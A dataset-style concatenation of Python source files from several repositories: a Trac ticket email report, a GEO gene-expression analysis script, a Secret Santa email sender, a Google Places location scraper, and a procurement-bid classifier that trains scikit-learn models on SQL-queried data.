""" header_line_template = '|| %%(id)%ds ||' % (len(ticket_url) + column_widths['id']) normal_line_template = '|| %s%%(id)%ds ||' % (ticket_url, column_widths['id']) line_template = '' for field in fields: line_template += ' %%(%s)%ds ||' % (field, column_widths[field]) header = { 'id' : 'URL' } for field in fields: header[field] = field table_header = (header_line_template + line_template) % header table = [] for id in notify_tickets: table.append((normal_line_template + line_template) % tickets_dict[id]) msg = '\n'.join ([msg_header, table_header] + table + [msg_tail]) htmlmsg_header = ''' <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <table> ''' htmlmsg_tail = ''' </table> </body> </html> ''' normal_line_template = '<td><a href="%s%%(id)s">%%(id)s</a></td>' % ticket_url line_template = '' for field in fields: line_template += '<td>%%(%s)s</td>' % field htmltable_header = '<tr><th>' + '</th><th>'.join(['Ticket'] + fields) + '</th></tr>' htmltable = [] for id in notify_tickets: htmltable.append(('<tr>' + normal_line_template + line_template + '</tr>') % tickets_dict[id]) htmlmsg = '\n'.join ([htmlmsg_header, htmltable_header] + htmltable + [htmlmsg_tail]) import email.Charset email.Charset.add_charset('utf-8', email.Charset.SHORTEST, None, None) if test: print msg print print htmlmsg else: mailmsg = MIMEMultipart('alternative') mailmsg['Subject'] = "Report testing Tickets at %s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) mailmsg['From'] = 'trac@example.org' mailmsg['To'] = ', '.join(recipient_list) part1 = MIMEText(msg, 'plain') part2 = MIMEText(htmlmsg.encode('utf-8', 'replace'), 'html', 'utf-8') mailmsg.attach(part1) mailmsg.attach(part2) s = smtplib.SMTP() s.connect() s.sendmail(mailmsg['From'], recipient_list, mailmsg.as_string()) s.close() f = open(last_exec_path, "w") f.write("%s" % cur_time) f.close()
Python
198
28.641415
180
/mail_report.py
0.64304
0.637076
rajashekarvarma/RIPGEO
refs/heads/master
import GEOparse # Python package to upload a geo data import pandas as pd import numpy as np from scipy import stats from statsmodels.stats import multitest import seaborn as sns import matplotlib.pyplot as plt ############### Fetch Agilent data ############### print('\n\n',"******...Hi Welcome to RIPGEO...******",'\n\n') GSE_ID = input('Please enter your GSE ID (ex:GSE62893): ') print('\n',"Provided GSE ID: ",GSE_ID) print('\n',"Intitating data extraction...",'\n\n') gse = GEOparse.get_GEO(geo=GSE_ID, destdir="./") plt_name=[] # print(gse.gpls) for pl_name, pl in gse.gpls.items(): plt_name.append(pl_name) plt_name=''.join(plt_name) print("Platform Name:", plt_name) pivoted_control_samples = gse.pivot_samples('VALUE') # print(pivoted_control_samples.head()) ######## Filter probes that are not expressed worst 25% genes are filtered out pivoted_control_samples_average = pivoted_control_samples.median(axis=1) # print("Number of probes before filtering: ", len(pivoted_control_samples_average)) expression_threshold = pivoted_control_samples_average.quantile(0.25) expressed_probes = pivoted_control_samples_average[pivoted_control_samples_average >= expression_threshold].index.tolist() # print("Number of probes above threshold: ", len(expressed_probes)) samples = gse.pivot_samples("VALUE").ix[expressed_probes] # print(samples.head()) # print(gse.gpls[plt_name].table) ######## Annotate matrix table samples_annotated = samples.reset_index().merge(gse.gpls[plt_name].table[["ID", "GB_ACC"]], left_on='ID_REF', right_on="ID").set_index('ID_REF') # print(samples_annotated.head()) del samples_annotated["ID"] # print(samples_annotated.head()) samples_annotated = samples_annotated.dropna(subset=["GB_ACC"]) samples_annotated = samples_annotated[~samples_annotated.GB_ACC.str.contains("///")] samples_annotated = samples_annotated.groupby("GB_ACC").median() # print(samples_annotated.index) print('\n','Column names from the matrix: ',samples_annotated.columns) ######## Extract matrix 
data to a csv file exprs = [] gsmNames = [] metadata = {} for gsm_name, gsm in gse.gsms.items(): # print(gsm.metadata['type'][0]) if gsm.metadata['type'][0]=='RNA': # Expression data if len(gsm.table)>0: tmp = gsm.table['VALUE'] # print(tmp) tmp.index = gsm.table['ID_REF'] gsmNames.append(gsm_name) if len(exprs)==0: exprs = tmp.to_frame() else: exprs = pd.concat([exprs,tmp.to_frame()],axis=1) print('\n','Extracting metadata...','\n') ######## extract metadata to csv file for gsm_name, gsm in gse.gsms.items(): if gsm.metadata['type'][0]=='RNA': for key,value in gsm.metadata.items(): # print(key) # print(value) if (key=='characteristics_ch1' or key=='characteristics_ch2') and (len([i for i in value if i!=''])>1 or value[0].find(': ')!=-1): # print(value) tmpVal = 0 for tmp in value: splitUp = [i.strip() for i in tmp.split(':')] # print(splitUp) if len(splitUp)==2: if not splitUp[0] in metadata: metadata[splitUp[0]] = {} metadata[splitUp[0]][gsm_name] = splitUp[1] else: if not key in metadata: metadata[key] = {} metadata[key][gsm_name] = splitUp[0] else: if not key in metadata: metadata[key] = {} if len(value)==1: metadata[key][gsm_name] = ' '.join([j.replace(',',' ') for j in value]) # Write expression data matrix to file exprs.columns = gsmNames with open(GSE_ID+'exprs.csv','w') as outFile: exprs.to_csv(outFile) # Write metadata matrix to file with open(GSE_ID+'metadata.csv','w') as outFile: outFile.write('Metadata,'+','.join(gsmNames)) for key in metadata: tmp = [key] for gsm_name in gsmNames: if gsm_name in metadata[key]: tmp.append(metadata[key][gsm_name]) else: tmp.append('NA') outFile.write('\n'+','.join(tmp)) print('\n','Data matrix and metadata for',GSE_ID,'have been written to',GSE_ID+'exprs.csv',GSE_ID+'metadata.csv @ cwd','\n') ######## select control and test sample columns samples_annotated = samples_annotated.astype(float) control_sample = input('Please enter column numbers of control samples (ex:0,2,4): ') control_samples = control_sample.split(',') 
control_samples = [int(i) for i in control_samples] Test_sample = input('Please enter column numbers of test samples (ex:3,5,7): ') Test_samples = Test_sample.split(',') Test_samples = [int(i) for i in Test_samples] print('\n','control samples column names entered:',control_samples,'\n') print('\n','Test samples column names entered:',Test_samples,'\n') ######## perform t-test for the data print('\n','Performing independednt T Test on the selected data...'+'\n') samples_annotated["Ttest"] = stats.ttest_ind(samples_annotated.T.iloc[Test_samples, :],samples_annotated.T.iloc[control_samples, :], equal_var=True, nan_policy="omit")[1] ######## perform anova # samples_annotated['Anova_one'] = [stats.f_oneway(samples_annotated.T.iloc[Test_samples, x],samples_annotated.T.iloc[control_samples, x])[1] for x in range(samples_annotated.shape[0])] # samples_annotated['Ttest'].to_csv('pvalues.csv') ######## filter data based FDR (<0.05) samples_annotated["FDR"] = multitest.multipletests(samples_annotated['Ttest'], alpha=0.05, method='fdr_bh', is_sorted=False, returnsorted=False)[1] # print(samples_annotated.head()) filtered_samples = samples_annotated.sort_values(by="FDR") f_samples = pd.DataFrame() f_samples['control'] = filtered_samples.T.iloc[Test_samples,:].mean() f_samples['test'] = filtered_samples.T.iloc[control_samples,:].mean() f_samples['p-value'] = filtered_samples['Ttest'] f_samples['FDR'] = filtered_samples['FDR'] ######## calculate log2FC f_samples['log2FC'] = f_samples['test'].apply(np.log2) - f_samples['control'].apply(np.log2) print('\n','Calculating Log2 values of the data...','\n') f_samples.to_csv('complete_unfiltered_data.csv') ######## filter gene list based on log2FC f_samples = f_samples[f_samples["FDR"] < 0.05] print('\n','Number of genes remaining after FDR filter of 0.05:',len(f_samples)) up_c = float(input('Please enter log2FC cutoff value for up regulation(ex:0.5): ')) dwn_c = float(input('Please enter log2FC cutoff value for down 
regulation(ex:-0.5): ')) diff_up = f_samples[f_samples['log2FC'] >= up_c] diff_down = f_samples[f_samples['log2FC'] <= dwn_c] ######## write up and down regulated genes to csv diff_up.to_csv('Upregulated_genes.csv') diff_down.to_csv('Downregulated_genes.csv') ######## plot log difference of upregulated and down regulated genes plot_y = input('Do you want to plot bar plot for log2 fold difference (yes/no): ') if plot_y == 'yes': diff = pd.concat([diff_up,diff_down]) diff_vals = diff['log2FC'].sort_values() counter = np.arange(len(diff_vals.values)) fig, ax = plt.subplots(figsize = (20,10)) ax.bar(counter,diff_vals.values, width=0.5) ax.set_xticks(counter) ax.set_xticklabels(diff_vals.index.values, rotation=90) ax.set_title("Gene expression differences of Control vs Test") ax.set_ylabel("log2 difference") plt.show() print('\n','Task completed...Output written successfully to current working directory.') else: print('\n','Task completed...Output written successfully to current working directory.')
Python
200
38.439999
185
/RIPGEO.py
0.608529
0.599011
ramimanna/Email-Secret-Santa
refs/heads/master
import os import random import smtplib # Email from dotenv import load_dotenv # For getting stored password #import getpass # For dynamically enter password load_dotenv() username = input("E-mail: ") # e.g. "your_gmail_to_send_from@gmail.com" password = os.getenv("PASSWORD") # alternatively: getpass.getpass() def santa_message_body(santa_assigment): return f"Your secret santa assignment is {santa_assigment}." def send_email(to_person, to_email, subject, message_body): server = smtplib.SMTP('smtp.gmail.com', 587) server.ehlo() server.starttls() server.login(username, password) sender_name = "Rami Manna" message = f"""From: {sender_name} <{username}> To: {to_person} <{to_email}> MIME-Version: 1.0 Content-type: text/html Subject: {subject} {message_body} """ server.sendmail(username, to_email, message) server.quit() def send_secret_santas(participants): not_gifted = {name for name, email in participants} for name, email in participants: santa_assigment = random.choice(list(not_gifted - {name})) not_gifted.remove(santa_assigment) message_body = santa_message_body(santa_assigment) subject = "Your Secret Santa Assignment!" send_email(name, email, subject, message_body) PARTICIPANTS = [('Harry Potter', 'potter@hogwarts.edu'), ('Hermione Granger', "hermione@hogwarts.edu")] if __name__ == "__main__": send_secret_santas(PARTICIPANTS)
Python
51
26.078432
67
/send_email.py
0.674385
0.670767
arvinwiyono/gmap-places
refs/heads/master
import requests import json import pandas as pd url = "https://maps.googleapis.com/maps/api/place/textsearch/json" key = "change_this" cities = [ 'jakarta', 'surabaya', 'malang', 'semarang' ] cols = ['street_address', 'lat', 'long'] df = pd.DataFrame(columns=cols) for city in cities: querystring = {"query":f"indomaret in {city}","key":key} res = requests.request("GET", url, params=querystring) json_res = json.loads(res.text) for result in json_res['results']: address = result['formatted_address'] lat = result['geometry']['location']['lat'] lng = result['geometry']['location']['lng'] df = df.append(pd.Series([address, lat, lng], index=cols), ignore_index=True) df.to_csv('for_pepe.csv', index=False)
Python
24
31.125
85
/get_locations.py
0.640726
0.640726
digital-sustainability/swiss-procurement-classifier
refs/heads/master
from train import ModelTrainer from collection import Collection import pandas as pd import logging import traceback import os logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) # === THESIS === anbieter_config = { 'Construction': [ 'Alpiq AG', 'Swisscom', 'Kummler + Matter AG', 'Siemens AG' ], 'IT': [ 'G. Baumgartner AG', 'ELCA Informatik AG', 'Thermo Fisher Scientific (Schweiz) AG', 'Arnold AG', ], 'Other': [ 'Riget AG', 'isolutions AG', 'CSI Consulting AG', 'Aebi & Co. AG Maschinenfabrik', ], 'Divers': [ 'DB Schenker AG', 'IT-Logix AG', 'AVS Syteme AG', 'Sajet SA' ] } # === TESTING === #anbieter = 'Marti AG' #456 #anbieter = 'Axpo AG' #40 #anbieter = 'Hewlett-Packard' #90 #anbieter = 'BG Ingénieurs Conseils' SA #116 #anbieter = 'Pricewaterhousecoopers' #42 #anbieter = 'Helbling Beratung + Bauplanung AG' #20 #anbieter = 'Ofrex SA' #52 #anbieter = 'PENTAG Informatik AG' #10 #anbieter = 'Wicki Forst AG' #12 #anbieter = 'T-Systems Schweiz' #18 #anbieter = 'Bafilco AG' #20 #anbieter = '4Video-Production GmbH' #3 #anbieter = 'Widmer Ingenieure AG' #6 #anbieter = 'hmb partners AG' #2 #anbieter = 'Planmeca' #4 #anbieter = 'K & M Installationen AG' #4 select_anbieter = ( "anbieter.anbieter_id, " "anbieter.institution as anbieter_institution, " "cpv_dokument.cpv_nummer as anbieter_cpv, " "ausschreibung.meldungsnummer" ) # anbieter_CPV are all the CPVs the Anbieter ever won a procurement for. So all the CPVs they are interested in. 
select_ausschreibung = ( "anbieter.anbieter_id, " "auftraggeber.institution as beschaffungsstelle_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "ausschreibung.sprache, " "ausschreibung.auftragsart_art, " "ausschreibung.lose, " "ausschreibung.teilangebote, " "ausschreibung.varianten, " "ausschreibung.projekt_id, " # "ausschreibung.titel, " "ausschreibung.bietergemeinschaft, " "cpv_dokument.cpv_nummer as ausschreibung_cpv, " "ausschreibung.meldungsnummer as meldungsnummer2" ) attributes = ['ausschreibung_cpv', 'auftragsart_art','beschaffungsstelle_plz','gatt_wto','lose','teilangebote', 'varianten','sprache'] # attributes = ['auftragsart_art'] config = { # ratio that the positive and negative responses have to each other 'positive_to_negative_ratio': 0.5, # Percentage of training set that is used for testing (Recommendation of at least 25%) 'test_size': 0.25, 'runs': 100, #'enabled_algorithms': ['random_forest'], 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'], 'random_forest': { # Tune Random Forest Parameter 'n_estimators': 100, 'max_features': 'sqrt', 'max_depth': None, 'min_samples_split': 2 }, 'decision_tree': { 'max_depth': 15, 'max_features': 'sqrt' }, 'gradient_boost': { 'n_estimators': 100, 'learning_rate': 0.1, 'max_depth': 15, 'max_features': 'sqrt' } } # Prepare Attributes def cleanData(df, filters): # if 'beschaffungsstelle_plz' in filters: # df[['beschaffungsstelle_plz']] = df[['beschaffungsstelle_plz']].applymap(ModelTrainer.tonumeric) if 'gatt_wto' in filters: df[['gatt_wto']] = df[['gatt_wto']].applymap(ModelTrainer.unifyYesNo) if 'anzahl_angebote' in filters: df[['anzahl_angebote']] = df[['anzahl_angebote']].applymap(ModelTrainer.tonumeric) if 'teilangebote' in filters: df[['teilangebote']] = df[['teilangebote']].applymap(ModelTrainer.unifyYesNo) if 'lose' in filters: df[['lose']] = df[['lose']].applymap(ModelTrainer.unifyYesNo) if 'varianten' in filters: df[['varianten']] = 
df[['varianten']].applymap(ModelTrainer.unifyYesNo) if 'auftragsart_art' in filters: auftrags_art_df = pd.get_dummies(df['auftragsart_art'], prefix='aftrgsrt',dummy_na=True) df = pd.concat([df,auftrags_art_df],axis=1).drop(['auftragsart_art'],axis=1) if 'sprache' in filters: sprache_df = pd.get_dummies(df['sprache'], prefix='lang',dummy_na=True) df = pd.concat([df,sprache_df],axis=1).drop(['sprache'],axis=1) if 'auftragsart' in filters: auftragsart_df = pd.get_dummies(df['auftragsart'], prefix='auftr',dummy_na=True) df = pd.concat([df,auftragsart_df],axis=1).drop(['auftragsart'],axis=1) if 'beschaffungsstelle_plz' in filters: plz_df = pd.get_dummies(df['beschaffungsstelle_plz'], prefix='beschaffung_plz',dummy_na=True) df = pd.concat([df,plz_df],axis=1).drop(['beschaffungsstelle_plz'],axis=1) return df class IterationRunner(): def __init__(self, anbieter_config, select_anbieter, select_ausschreibung, attributes, config, cleanData): self.anbieter_config = anbieter_config self.select_anbieter = select_anbieter self.select_ausschreibung = select_ausschreibung self.attributes = attributes self.config = config self.cleanData = cleanData self.trainer = ModelTrainer(select_anbieter, select_ausschreibung, '', config, cleanData, attributes) self.collection = Collection() def run(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr_id in range(len(self.attributes)-1): att_list = self.attributes[:attr_id+1] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesEachOne(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr in self.attributes: att_list = [attr] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runSimpleAttributeList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: self.singleRun(anbieter, self.attributes, label) 
self.trainer.resetSQLData() def singleRun(self, anbieter, att_list, label): logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list)) try: self.trainer.attributes = att_list self.trainer.anbieter = anbieter output = self.trainer.run() output['label'] = label self.collection.append(output) filename = os.getenv('DB_FILE', 'dbs/auto.json') self.collection.to_file(filename) except Exception as e: traceback.print_exc() print(e) print('one it done') runner = IterationRunner(anbieter_config, select_anbieter, select_ausschreibung, attributes, config, cleanData) if __name__ == '__main__': # runner.collection.import_file('dbs/auto.json') runner.run() runner.runAttributesEachOne() # label, anbieters = next(iter(runner.anbieter_config.items())) # print(label)
Python
206
34.378639
134
/runOldIterations.py
0.628293
0.619512
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import pandas as pd import math from datetime import datetime from sklearn.utils import shuffle from sklearn.model_selection import train_test_split, cross_val_score from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, confusion_matrix, matthews_corrcoef from db import connection, engine import logging logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class ModelTrainer(): def __init__(self, select_anbieter, select_ausschreibung, anbieter, config, cleanData, attributes=[]): self.anbieter = anbieter self.select_anbieter = select_anbieter self.select_ausschreibung = select_ausschreibung self.attributes = attributes self.config = config self.cleanData = cleanData def run(self): positive_sample, negative_samples = self.createSamples() positive_and_negative_samples = self.prepareForRun( positive_sample, negative_samples ) # most certainly used to resolve the naming functions like getFalseProjectTitle merged_samples_for_names = self.prepareUnfilteredRun( positive_sample, negative_samples ) result = self.trainSpecifiedModels(positive_and_negative_samples) return result # xTests, yTests = self.trainModel(positive_and_negative_samples) def resetSQLData(self): try: del self.positives del self.negatives except: pass def createSamples(self): if not hasattr(self, 'positives') or not hasattr(self, 'negatives'): self.queryData() negative_samples = [] negative_sample_size = math.ceil(len(self.positives) * (self.config['positive_to_negative_ratio'] + 1)) for count in range(self.config['runs']): negative_samples.append(self.negatives.sample(negative_sample_size, random_state=count)) self.positives['Y'] = 1 for negative_sample in negative_samples: negative_sample['Y']=0 return (self.positives, negative_samples) def queryData(self): self.positives = self.__runSql(True) self.negatives = self.__runSql(False) logger.info('sql done') 
return self.positives, self.negatives def __runSql(self, response): resp = '=' if (not response): resp = '!=' query = """SELECT * FROM (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) WHERE anbieter.institution {} "{}" ) anbieter JOIN (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = ausschreibung.meldungsnummer) WHERE anbieter.institution {} "{}" ) ausschreibung ON ausschreibung.meldungsnummer2 = anbieter.meldungsnummer ORDER BY ausschreibung.meldungsnummer2; """.format(self.select_anbieter, resp, self.anbieter, self.select_ausschreibung, resp, self.anbieter) return pd.read_sql(query, engine) def prepareForRun(self, positive_sample, negative_samples): # What attributes the model will be trained by filters = ['Y', 'projekt_id'] + self.attributes positive_and_negative_samples = [] for negative_sample in negative_samples: # Merge positive and negative df into one, only use selected attributes merged_samples = positive_sample.append(negative_sample, ignore_index=True)[filters].copy() # Clean the data of all 
selected attributes cleaned_merged_samples = self.cleanData(merged_samples, self.attributes) positive_and_negative_samples.append(cleaned_merged_samples) return positive_and_negative_samples def prepareUnfilteredRun(self, positive_sample, negative_samples): merged_samples_for_names = [] for negative_sample in negative_samples: # Merge positive and negative df into one merged_samples_for_names.append(positive_sample.append(negative_sample, ignore_index=True).copy()) return merged_samples_for_names def trainSpecifiedModels(self, positive_and_negative_samples): result = {} for algorithm in self.config['enabled_algorithms']: if algorithm == 'random_forest': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] min_samples_split = self.config[algorithm]['min_samples_split'] classifier = lambda randomState: RandomForestClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, min_samples_split=min_samples_split, random_state=randomState, n_jobs=-1 ) elif algorithm == 'gradient_boost': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] learning_rate = self.config[algorithm]['learning_rate'] classifier = lambda randomState: GradientBoostingClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, learning_rate=learning_rate, random_state=randomState ) elif algorithm == 'decision_tree': max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] classifier = lambda randomState: DecisionTreeClassifier( max_depth=max_depth, max_features=max_features ) else: raise Exception('enabled algorithm: {} doesn\'t exist.'.format(algorithm)) result[algorithm] = {} xTests, yTests = self.trainModel(positive_and_negative_samples, classifier, algorithm) result['attributes'] = 
self.attributes result['anbieter'] = self.anbieter result['timestamp'] = datetime.now().isoformat() #result[algorithm]['xTests'] = xTests #result[algorithm]['yTests'] = yTests result[algorithm]['metrics'] = self.config[algorithm] evaluation_dataframe =pd.concat([self.__getConfusionMatices(yTests), self.__getAccuracies(yTests)], axis=1, sort=False) result[algorithm]['data'] = evaluation_dataframe.to_dict() result[algorithm]['metadata'] = self.__getIterationMetadata(evaluation_dataframe) return result def trainModel(self, positive_and_negative_samples, classifier, algorithm): xTests = [] yTests = [] for idx, df in enumerate(positive_and_negative_samples): # enum to get index x_and_y_test, x_and_y_train = self.unique_train_and_test_split(df, random_state=idx) # Select all attributes xtest = x_and_y_test.drop(['Y'], axis=1) xtrain = x_and_y_train.drop(['Y'], axis=1) # Only select the response result attributes ytest = x_and_y_test['Y'] ytrain = x_and_y_train['Y'] # Create the model clf = classifier(randomState=idx) # Compute cross validation (5-fold) scores = self.__cross_val_score(clf, xtest, ytest, cv=5) print(scores) print('Avg. 
CV Score | {} Run {}: {:.2f}'.format(algorithm, idx, round(sum(scores)/len(scores), 4))) xtest = xtest.drop(['projekt_id'], axis=1) xtrain = xtrain.drop(['projekt_id'], axis=1) # Train the model on training sets clf = clf.fit(xtrain, ytrain) # Predict on the test sets prediction = clf.predict(xtest) # Convert pandas.series to data frame df_ytest = ytest.to_frame() # Add run number to df df_ytest['run'] = idx xtest['run'] = idx # add prediction to df df_ytest['prediction']= prediction # add result of run to df df_ytest['correct'] = df_ytest['prediction']==df_ytest['Y'] # add run to run arrays xTests.append(xtest) yTests.append(df_ytest) return xTests, yTests def __getAccuracies(self, dfys): res = pd.DataFrame(columns=['accuracy', 'MCC', 'fn_rate']) for dfy in dfys: acc = round(accuracy_score(dfy.Y, dfy.prediction), 4) # f1 = round(f1_score(dfy.Y, dfy.prediction), 4) mcc = matthews_corrcoef(dfy.Y, dfy.prediction) matrix = confusion_matrix(dfy.Y, dfy.prediction) fnr = round(matrix[1][0] / (matrix[1][1] + matrix[1][0]), 4) # add row to end of df, *100 for better % readability res.loc[len(res)] = [ acc*100, mcc, fnr*100 ] return res def __getConfusionMatices(self, dfys): res = pd.DataFrame(columns=['tn', 'tp', 'fp', 'fn']) for dfy in dfys: # ConfusionMatrix legende: # [tn, fp] # [fn, tp] matrix = confusion_matrix(dfy.Y, dfy.prediction) res.loc[len(res)] = [ matrix[0][0], matrix[1][1], matrix[0][1], matrix[1][0] ] # res.loc['sum'] = res.sum() # Summarize each column return res def __getIterationMetadata(self, df): res = {} res['acc_mean'] = df['accuracy'].mean() res['acc_median'] = df['accuracy'].median() res['acc_min'] = df['accuracy'].min() res['acc_max'] = df['accuracy'].max() res['acc_quantile_25'] = df['accuracy'].quantile(q=.25) res['acc_quantile_75'] = df['accuracy'].quantile(q=.75) res['mcc_mean'] = df['MCC'].mean() res['mcc_median'] = df['MCC'].median() res['mcc_min'] = df['MCC'].min() res['mcc_max'] = df['MCC'].max() res['mcc_quantile_25'] = 
df['MCC'].quantile(q=.25) res['mcc_quantile_75'] = df['MCC'].quantile(q=.75) res['fn_rate_mean'] = df['fn_rate'].mean() res['fn_rate_median'] = df['fn_rate'].median() res['fn_rate_min'] = df['fn_rate'].min() res['fn_rate_max'] = df['fn_rate'].max() res['fn_rate_quantile_25'] = df['fn_rate'].quantile(q=.25) res['fn_rate_quantile_75'] = df['fn_rate'].quantile(q=.75) res['sample_size_mean'] = (df['fp'] + df['fn'] + df['tn'] + df['tp']).mean() return res def __cross_val_score(self, clf, x_values, y_values, cv): x_and_y_values = pd.concat([y_values, x_values], axis=1) cross_val_scores = [] for validation_run_index in range(cv): x_and_y_test, x_and_y_train = self.unique_train_and_test_split(x_and_y_values, random_state=validation_run_index) # Select all attributes but meldungsnummer xtest = x_and_y_test.drop(['projekt_id', 'Y'], axis=1) xtrain = x_and_y_train.drop(['projekt_id', 'Y'], axis=1) # Only select the response result attributes ytest = x_and_y_test['Y'] ytrain = x_and_y_train['Y'] clf = clf.fit(xtrain, ytrain) prediction = clf.predict(xtest) cross_val_scores.append(accuracy_score(ytest, prediction)) return cross_val_scores def unique_train_and_test_split(self, df, random_state): run = shuffle(df, random_state=random_state) # run index as random state # Get each runs unique meldungsnummer unique_mn = run.projekt_id.unique() # Split the meldungsnummer between test and trainings set so there will be no bias in test set x_unique_test, x_unique_train = train_test_split(unique_mn, test_size=self.config['test_size'], random_state=random_state) # Add the remaining attributes to meldungsnummer x_and_y_test = run[run['projekt_id'].isin(x_unique_test)].copy() x_and_y_train = run[run['projekt_id'].isin(x_unique_train)].copy() return x_and_y_test, x_and_y_train # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. 
Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, } return switcher.get(val, 0)
Python
305
45.27869
131
/train.py
0.599164
0.593569
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import pandas as pd import numpy as np import math import re from datetime import datetime from sklearn.utils import shuffle from sklearn.model_selection import train_test_split, cross_val_score from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, confusion_matrix, matthews_corrcoef from sklearn import tree from db import connection, engine import logging logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class ModelTrainer(): def __init__(self, select, anbieter, config, attributes=[]): self.anbieter = anbieter self.select = select self.attributes = attributes self.config = config def run(self): self.queryData() prepared_positives, prepared_negatives, duplicates = self.prepare_data() result = self.trainAllModels(prepared_positives, prepared_negatives) result['duplicates'] = duplicates.to_dict() return result def resetSQLData(self): try: del self.positives del self.negatives except: pass def trainAllModels(self, positives, negatives): result = { 'attributes': self.attributes, 'anbieter': self.anbieter, 'timestamp': datetime.now().isoformat() } samples = self.createSamples(positives, negatives) result = {**result, **self.trainAllAlgorithms(samples)} return result def createSamples(self, positives, negatives): negative_sample_size = math.ceil(len(positives) * (self.config['positive_to_negative_ratio'] + 1)) samples = [] for runIndex in range(self.config['runs']): negative_sample = negatives.sample(negative_sample_size, random_state=runIndex) sample = positives.append(negative_sample, ignore_index=True) sample.reset_index(drop=True, inplace=True) sample.fillna(0, inplace=True) sample = shuffle(sample, random_state=runIndex) samples.append(sample) return samples def trainAllAlgorithms(self, samples): result = {} for algorithm in self.config['enabled_algorithms']: if algorithm == 'random_forest': n_estimators = 
self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] min_samples_split = self.config[algorithm]['min_samples_split'] classifier = lambda randomState: RandomForestClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, min_samples_split=min_samples_split, random_state=randomState, n_jobs=-1 ) elif algorithm == 'gradient_boost': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] learning_rate = self.config[algorithm]['learning_rate'] classifier = lambda randomState: GradientBoostingClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, learning_rate=learning_rate, random_state=randomState ) elif algorithm == 'decision_tree': max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] classifier = lambda randomState: DecisionTreeClassifier( max_depth=max_depth, max_features=max_features ) else: raise Exception('enabled algorithm: {} doesn\'t exist.'.format(algorithm)) result[algorithm] = {} x_tests, y_tests = self.trainModel(samples, classifier, algorithm) result[algorithm]['metrics'] = self.config[algorithm] evaluation_dataframe = pd.concat([self.__getConfusionMatices(y_tests), self.__getAccuracies(y_tests)], axis=1, sort=False) result[algorithm]['data'] = evaluation_dataframe.to_dict() result[algorithm]['metadata'] = self.__getIterationMetadata(evaluation_dataframe) return result def trainModel(self, samples, get_classifier, algorithm): x_tests = [] y_tests = [] for runIndex, sample in enumerate(samples): classifier = get_classifier(runIndex) train, test = train_test_split(sample, random_state=runIndex) if 'skip_cross_val' not in self.config or not self.config['skip_cross_val']: # Compute cross validation (5-fold) scores = self.__cross_val_score(classifier, train, cv=5) 
